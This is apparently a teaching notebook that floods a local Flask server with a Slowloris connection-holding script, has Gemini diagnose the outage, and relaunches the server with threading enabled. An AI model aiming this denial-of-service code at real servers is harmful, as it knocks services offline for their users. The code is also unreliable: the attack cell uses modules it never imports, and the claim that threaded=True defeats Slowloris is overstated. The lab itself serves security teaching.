In [ ]:
!pip install --upgrade google-cloud-aiplatform --quiet
!gcloud services enable aiplatform.googleapis.com
import vertexai
from vertexai.generative_models import GenerativeModel
import subprocess

# --- CONFIGURE THESE ---
PROJECT_ID = "YOUR_PROJECT_ID"  # Replace with your GCP Project ID
LOCATION = "us-central1"

vertexai.init(project=PROJECT_ID, location=LOCATION)
model = GenerativeModel("gemini-1.5-flash")

print(f"Gemini API Initialized for project {PROJECT_ID}")

In [ ]:
!pip install Flask --quiet

In [ ]:

with open('app.py', 'w') as f:
    f.write("""
from flask import Flask
import time

app = Flask(__name__)

@app.route('/')
def home():
    # Simulate a small processing delay
    return "<h1>System Status: Healthy</h1><p>Server is responding to requests.</p>"

if __name__ == '__main__':
    # threaded=False is key here; it makes the server handle only one request at a time
    app.run(host='0.0.0.0', port=5000, threaded=False)
""")


server_proc = subprocess.Popen(['python', 'app.py'])

print("Web Server starting on http://localhost:5000")
print("Action: Go to 'Tools' -> 'UI Preview' and enter port 5000 to see the live site.")

In [ ]:
def run_slowloris_attack():
    target_ip = "127.0.0.1"
    port = 5000
    connections = 100
    sockets = []

    print(f"Starting attack: Opening {connections} 'slow' connections...")
    
    for i in range(connections):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(4)
            s.connect((target_ip, port))
            # Send partial headers to keep the connection open
            s.send(f"GET /?{time.time()} HTTP/1.1\r\n".encode("utf-8"))
            s.send("Host: localhost\r\n".encode("utf-8"))
            sockets.append(s)
            if i % 20 == 0: print(f"Held {i} connections...")
        except Exception as e:
            print(f"Connection failed: {e}")
            break
            
    print("--- ATTACK ACTIVE ---")
    print("Action: Try refreshing your UI Preview. It should now be unresponsive.")
    return sockets

active_attack_sockets = run_slowloris_attack()

In [ ]:
def check_server_health():
    try:
        # Use curl to check if the server responds within 3 seconds
        result = subprocess.check_output(['curl', '--max-time', '3', 'http://localhost:5000'], stderr=subprocess.STDOUT)
        return True, result.decode()
    except Exception:
        return False, "Request Timed Out"

is_healthy, response_text = check_server_health()

if not is_healthy:
    print("ALERT: Server is unresponsive! Consulting Gemini for AIOps assistance...")
    
    # We provide Gemini with context about the environment and the symptoms
    prompt = f"""
    SITUATION:
    - Web server is unresponsive (Timeout).
    - Current infrastructure: Flask development server (app.py).
    - Monitoring data: {len(active_attack_sockets)} active TCP connections from localhost.
    - Server code snippet: `app.run(host='0.0.0.0', port=5000, threaded=False)`
    
    TASK:
    1. Identify the type of attack occurring.
    2. Explain why the current 'threaded=False' setting is causing the failure.
    3. Provide the specific code change to make the server more resilient.
    """
    
    ai_response = model.generate_content(prompt)
    print("\n--- GEMINI SRE ANALYSIS ---")
    print(ai_response.text)
    
    # Cleanup to restore system
    for s in active_attack_sockets: s.close()
    server_proc.terminate()
    print("\n[MIGRATION]: Attack sockets closed. Server process terminated for patching.")
else:
    print("Server is still healthy. No action needed.")

In [ ]:
# Create the patched (fixed) app file
with open('app_patched.py', 'w') as f:
    f.write("""
from flask import Flask
app = Flask(__name__)

@app.route('/')
def home():
    return "<h1>System Status: FIXED</h1><p>Gemini applied 'threaded=True'. I can now handle multiple connections!</p>"

if __name__ == '__main__':
    # Gemini's Fix: threaded=True allows the server to bypass Slowloris clogs
    app.run(host='0.0.0.0', port=5000, threaded=True)
""")

# Start the NEW server
patched_server_proc = subprocess.Popen(['python', 'app_patched.py'])
print("Patched Server starting... Check your UI Preview now!")

In [ ]:
# Final cleanup
try:
    server_proc.terminate()
    for s in active_attack_sockets:
        s.close()
    print("Lab cleanup complete. All background processes stopped.")
except:
    pass